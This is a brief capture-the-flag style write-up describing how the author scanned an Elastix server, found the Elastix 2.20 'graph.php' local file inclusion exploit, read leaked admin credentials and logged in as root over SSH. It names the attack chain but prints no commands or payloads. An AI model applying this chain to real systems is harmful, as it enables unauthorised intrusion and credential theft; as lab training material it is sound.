Reconnaissance

I used nmap to see what ports/services were showing as up and running.

Doing basic recon on what is showing as up from the scan, there appears to be a web server with a database backend and some sort of mailserver. The next thing I did was pull up the website.

We have a website running Elastix with a database backend storing username and passwords for access to this site.

Enumeration

I ran a quick Gobuster scan to see what directories are available on the website that I could glean more information from.

A couple of directories sparked my interest here… the /admin, the /recordings, and the /vtigercrm.

So it appears to be an online voicemail mailbox system. I decided to look up some exploits for Elastix on searchsploit to see what’s out there.

Exploitation

The most interesting one that caught my eye here was the Elastix 2.20 - ‘graph.php’ Local File Inclusion. I looked up the source code for this so I can get a better understanding of what it does.

This part of the exploit stuck out to me because enumerating the directories told me that there was already a /vtigercrm directory. So I decided to paste the code and see what happened.

This was pretty unreadable. So I decided to view the source code to see if it is formatted better. It looks like the exploit worked and provided a wealth of information that I can use to get into the system.

This is a lot more readable.

Post-Exploitation

The exploit revealed the admin password. I decided to try to ssh in to the system using the admin password for root to see if I could root the box immediately.

That worked and I was able to get the root flag.

From there, I went to the home directory to find the users and found the user flag.

Results Analysis

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. The exploit took advantage of this and supplied information to pull local data. This data contained what was need to root the box.